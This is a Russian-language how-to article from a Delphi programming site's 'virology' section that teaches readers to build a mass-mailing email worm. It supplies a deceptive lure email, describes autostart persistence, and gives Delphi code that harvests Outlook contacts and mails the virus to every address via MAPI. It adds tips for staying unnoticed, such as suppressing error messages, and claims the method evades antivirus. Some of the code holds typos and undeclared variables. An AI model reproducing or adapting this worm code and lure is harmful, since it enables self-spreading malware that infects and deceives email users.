Воскресенье, 22.12.2024, 08:33 Приветствую вас Гость | Группа "Гости" 
Меню сайта

Категории раздела
Вирусология [40]
Статьи о вирусах
Системные [1]
Работа с системой
Примеры [45]
Приёмы, функции, процедуры
Ceти [1]
Работа с интернет
Шуточные программы [5]
Пишем шуточные программки
Остальное [6]
Всё что не вошло

Популярные статьи

Недавние темы

Опрос
Стоит ли сменить дизайн сайта?
Всего ответов: 444

Главная » Статьи » Delphi » Вирусология

Сетевое распостранение
Сетевые вирусыСегодня я опишу тебе принцип работы сетевого вируса. Тема, как ты понял, весьма актуальная, поскольку 70% лично моего ящика всегда бывает забита вирусами самого разного пошиба - от мелких, но злобных VBS-червей до полуторамеговых произведений младших школьников Они-то ведь не знают про существование WinAPI Для проникновения на компьютер вирусы могут либо использовать баги в ПО юзера (VBS+Outlook= love:)) либо - баги в голове самого юзера. Рассмотрим пример такого вирусного письма:


Subj: Прикол
Привет! Держи крутой прикол, который я тебе (или не тебе, не помню ) Обещал. Но все равно держи. Не бойся, по-настоящему он ничего не форматирует! Проверить не забудь, параноик 
Успехов!
Attach: fake_format.exe

Ну так вот: каждый ламероватый интернетчик посылает своим друзьям приколы постоянно, и, соответственно, не очень-то помнит, кому чего обещал; сообщение о "ненастоящем форматировании” переключает мозги жертвы в русло приколов, а слепая вера в антивирусы - добивает Напомню - описанные мной алгоритмы не определяются никакими webами, avp и другими бойцами.

Короче, мне самому уже захотелось запустить этот веселенький прикол. Запускаю  

Error… intel pentium 5 notfound!

Ой.. Вроде как не работает? Не, не угадал На самом деле вирус тут же перенес свое тело на хард к жертве, записался в автозагрузку, и теперь будет тусоваться в оперативочке (хинт: на медицинском жаргоне "оперативка” - это ОПЕРАТИВНАЯ ХИРУРГИЯ, так что будь осторожен ) жертвы по принципу, описанному мной в статье "резидентный вирус своими руками”. Только вот проверять он будет не запуск файлов, а подключение к сети интернет (в исходнике это будет процедура IsOnline, так, на будущее ). Впрочем, одновременно мониторить запуск файлов тебе никто не мешает - это все-таки вирус, хоть и сетевик. Поэтому в логику я включу процедуру InfectFile. Таким образом, мы будем использовать следующие функции и процедуры:

ISONLINE - проверка соединения с инетом
SENDVIRUS - догадайся с трех раз 
GETMAILS - получаем адреса из AddresBook аутглюка
INFECTFILES - 
WORKMEMORY - почти то же, что в прошлой статье, но с модификациями.

КОДИНГ

До начала собственно кодига на этот раз необходимы будут долгие предварительные ласки Объясняю почему: для чтения адресной книги мы будем обращаться к аутлуку по межпрограммному интерфейсу, а для этого нам нехило поиметь его type library. Вот и делай: projectа import type library, и ищи там… правильно, Outlook express v.9 или какой там у тебя стоит. Девятой считается версия, если не ошибаюсь, из Office2k. Импортировал? Что значит "нет в списке”? Да ладно, бывает. Ищи вручную - в каталоге с офисом есть файл msoutl.olb. Это она Теперь в раздел uses пиши outlook_tlb и будешь иметь доступ к самым интимным местам адресной книги Ой, какой-то я сегодня озабоченный В общем, процедура потрошения адресбука должна выглядеть так:

uses
ComObj, outlook_tlb,
Forms;
….
Procedure GETMAILS;
var
MyFolder, MSOutlook, MyNameSpace, MyItem : Variant;
s : string;
num, i : Integer;
mails : array of string; 

begin
MSOutlook := CreateOleObject(’Outlook.Application’);
MyNameSpace := MSOutlook.GetNameSpace(’MAPI’);
MyFolder := MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength (mails,MyFilder.Items.Count);
for i := 1 to MyFolder.Items.Count do
begin
MyItem := MyFolder.Items[i];
mails[i]:= myitem.email1addres;
end; 

end.

Ну как, порадовало тебя написанное? Гы, дальше будет только хуже. Потому что отправка вируса будет на чистом API. А это, как говорит Horrific: "то же самое, что ручной секс. Эффект есть в обоих случаях, но его приходится долго добиваться и нет такого кайфа” Ну так что я тут понаписал? Uses Comobj позволяет нам работать с COM технологией; далее мы только создаем OLE объект аутлука, и циклически выясняем у него список емайлов. Если тебе хочется выяснить еще что-нибудь - это тоже реально, читай доки - они рулез. Хоть и на английском. Список емайлов пишется в динамический массив из строчек. Его будет юзать функция SendVirus. Вот эта:

function SendVirus(const RecipName, RecipAddress, Subject, Attachment: string):Boolean;
var
MapiMessage : TMapiMessage;
MapiFileDesc : TMapiFileDesc;
MapiRecipDesc : TMapiRecipDesc;
i : integer;
s : string;
begin
with MapiRecipDesc do begin
ulRecerved := 0;
ulRecipClass := MAPI_TO;
lpszName := PChar(RecipName);
lpszAddress := PChar(RecipAddress);
ulEIDSize := 0;
lpEntryID := nil;
end; 

with MapiFileDesc do begin
ulReserved := 0;
flFlags := 0;
nPosition := 0;
lpszPathName := PChar(Attachment);
lpszFileName := nil;
lpFileType := nil;
end; 

with MapiMessage do begin
ulReserved := 0;
lpszSubject := nil;
lpszNoteText := PChar(Subject);
lpszMessageType := nil;
lpszDateReceived := nil;
lpszConversationID := nil;
flFlags := 0;
lpOriginator := nil;
nRecipCount := 1;
lpRecips := @MapiRecipDesc;
if length(Attachment)> 0 then begin
nFileCount := 1;
lpFiles := @MapiFileDesc;
end else begin
nFileCount := 0;
lpFiles := nil;
end;
end; 

Result := MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG or MAPI_LOGON_UI or MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
end;

Ты не опух, пока это читал? Пойди, попей пивка, а то ничего не поймешь. Выпил? Я тоже Хорошо, продолжаем. Юзать будешь так:

For i := 1 to length (mails) do
begin
SendVirus ('’,mails[i],’pricol’,’..’);
end;

Здесь мы задействуем функции uses MAPI, поэтому не забудь его объявить. Короче, это - низкоуровневая работа с почтой. А для работы с почтой, как ты знаешь, надо иметь а) email получателя б) текст письма в) аттач. Вот я и делаю: MapiRecipDesc - описываю получателя, MapiFileDesc - аттач, т.е. наш вирус, MapiMessage - это сообщение, потом я его командой MapiSendMail отправлю в большую жизнь Ну, не так это оказалось и сложно. Главное понять, что твой самый большой друг - это не c:\porno, а win32.hlp  

Как же теперь все это словоблудие уложить в суровую логику вируса? Сам разберешься, я тебе уже 2 статьи подряд об этом долблю. И вообще, я вчера отмечал день рождения моей девушки, теперь у меня слегка трещит голова Ну ладно, чувство долга сильнее. Just Do It: первой строчкой проверяешь имя файла, откуда ты стартовал. Если pricol.exe - значит CopyFile к виндам А если стартанул из виндового каталога - то циклически проверяй подключение к всемирной сети. Проверяем:

function IsOnline: Boolean;
var
RASConn : TRASConn;
dwSize,dwCount : DWORD;
begin
RASConns.dwSize := SizeOf(TRASConn);
dwSize := SizeOf(RASConns);
Res :=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Result := (Res = 0) and (dwCount > 0);
end;

Так. Если все путем, то вперед - тряси адресную книгу и рассылайся. Тут есть две хитрости. Если твое имя pricol.exe - незамедлительно проверяй соединение. Возможно, пользователь проверяет почту в онлайне. Так наши шансы на рассылку сильно возрастут. До второй хитрости ты уже допер сам, а именно, при описанном мной раскладе ты будешь все время отправлять одному и тому же юзеру одинаковые письма, только потому, что его не стерли из адресбука. Следовательно, все отработанные адреса записывай в логфайл и постоянно с ним сверяйся. Вроде бы все. Хотя нет. Не забывай ошибкоопасные фрагменты кода заключать в try..except. И ставить ключ {$D-}. Потому что если юзер вдруг поймает ошибку в духе "FUCK!!! is not valid integer value”, он что-то да заподозрит.

Категория: Вирусология | Добавил: dolphin (27.09.2008)
Просмотров: 2925 | Рейтинг: 3.0/4

Всего комментариев: 0
avatar
Профиль



Поиск

Наша кнопка
Вирусология, взгляд из Delphi

Статистика
Top.Mail.Ru Яндекс.Метрика Счетчик тИЦ и PR
Статистика материалов
Файлов: 457
Форум: 1175/8162
Коментариев: 770
Новостей: 29

Статистика пользователей
Всего: 385
За неделю: 2
Вчера: 0
Сегодня: 0
Всего онлайн: 1
Гостей: 1
Пользователей: 0

delphicode.ru © 2008 - 2024 Хостинг от uCoz